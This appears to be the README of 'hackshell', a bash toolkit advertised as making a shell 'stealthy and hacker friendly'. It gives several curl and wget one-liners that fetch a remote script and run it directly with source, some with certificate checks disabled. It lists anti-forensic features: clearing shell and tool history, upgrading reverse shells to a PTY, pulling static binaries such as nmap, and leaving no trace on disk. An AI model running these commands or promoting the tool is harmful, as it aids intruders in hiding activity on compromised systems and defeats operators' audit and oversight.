Make BASH stealthy and hacker friendly with lots of bash functions
Usage:
source <(curl -SsfL https://thc.org/hs) source <(curl -SsfL https://github.com/hackerschoice/hackshell/raw/main/hackshell.sh)Ignore SSL / Certificate warnings:
source <(curl -kSsfL https://github.com/hackerschoice/hackshell/raw/main/hackshell.sh) source <(wget --no-check-certificate -q -O- https://github.com/hackerschoice/hackshell/raw/main/hackshell.sh)Some features:
- unsets HISTFILE, SSH_CONNECT, wget/redis/mysql/less-HISTORY, ...
- Upgrates to PTY shell (if reverse shell)
- Creates hacker-friendly shortcuts, bash-functions and aliases
- Static binary download by simple
bin <command>(e.g.bin nmap) - Does not write ANY data to the harddrive
- Leaves no trace
